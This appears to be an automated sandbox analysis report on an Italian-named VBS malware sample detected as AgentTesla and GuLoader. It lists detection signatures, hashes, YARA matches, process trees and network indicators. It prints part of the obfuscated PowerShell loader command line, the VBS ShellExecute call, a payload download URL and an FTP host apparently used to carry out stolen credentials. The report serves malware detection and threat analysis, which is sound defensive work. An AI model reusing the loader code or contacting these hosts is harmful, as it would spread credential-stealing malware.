Windows Analysis Report
Richiesta urgente.vbs

Overview

General Information

Sample Name: Richiesta urgente.vbs
Analysis ID: 755115
MD5: de0edf01710a38b1e96688ae2f712ebb
SHA1: 6791a70cf79c415ba109e86734bcfd1b4930ec31
SHA256: 20796159ce1191fe88603ee4be1855bca614bcb29161d149a6990b48589d88c5
Tags: vbs
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: ftp.mcmprint.net Virustotal: Detection: 9% Perma Link
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll Jump to behavior
Source: Binary string: fk8C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.pdb source: powershell.exe, 00000003.00000002.738843445.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.31.121.136 185.31.121.136
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /nnslx/arPdDEHecKTUsOQSyN133.asi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache
Uses FTP
Source: unknown FTP traffic detected: 185.31.121.136:21 -> 192.168.2.5:49711 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 12:08. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ftp://ftp.mcmprint.netnoffice
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000A.00000002.836359577.000000001DBDA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.836857074.000000001DC27000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.734109094.0000000001621000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://3LpbHlMRrrHdHc2KU.net
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://OowQOv.com
Source: powershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: powershell.exe, 00000003.00000003.515219304.0000000007748000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: CasPol.exe, 0000000A.00000002.823176402.000000000178B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://qwedft.gq/nnslx/arPdDEHecKTUsOQSyN133.asi
Source: powershell.exe, 00000003.00000002.727863466.0000000004761000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.751015129.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.755141818.00000000057BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: CasPol.exe, 0000000A.00000002.835470599.000000001DB51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: qwedft.gq
Source: global traffic HTTP traffic detected: GET /nnslx/arPdDEHecKTUsOQSyN133.asi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 5840, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Jibboom.ShellExecute Cystatrophia162, " " & chrw(34) & A5 & chrw(34), "", "", 0
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5465
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5465 Jump to behavior
Yara signature match
Source: Richiesta urgente.vbs, type: SAMPLE Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_4088.amsi.csv, type: OTHER Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 5840, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_009A0040 3_2_009A0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_009A8868 3_2_009A8868
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_009A4968 3_2_009A4968
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_009A7B90 3_2_009A7B90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_009A8868 3_2_009A8868
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00A40040 3_2_00A40040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00A40040 3_2_00A40040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_009A4958 3_2_009A4958
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_0136BA76 10_2_0136BA76
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1DA00B7D 10_2_1DA00B7D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1DB3D832 10_2_1DB3D832
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1DB37E50 10_2_1DB37E50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_20220900 10_2_20220900
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_20220070 10_2_20220070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_20222940 10_2_20222940
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_202208A0 10_2_202208A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E9CF8 10_2_209E9CF8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E6050 10_2_209E6050
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209EBE98 10_2_209EBE98
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209EC2D8 10_2_209EC2D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209EA6EC 10_2_209EA6EC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E3FF0 10_2_209E3FF0
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1D95AFDA NtQuerySystemInformation, 10_2_1D95AFDA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1D95AFB8 NtQuerySystemInformation, 10_2_1D95AFB8
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
Java / VBScript file with very long strings (likely obfuscated code)
Source: Richiesta urgente.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
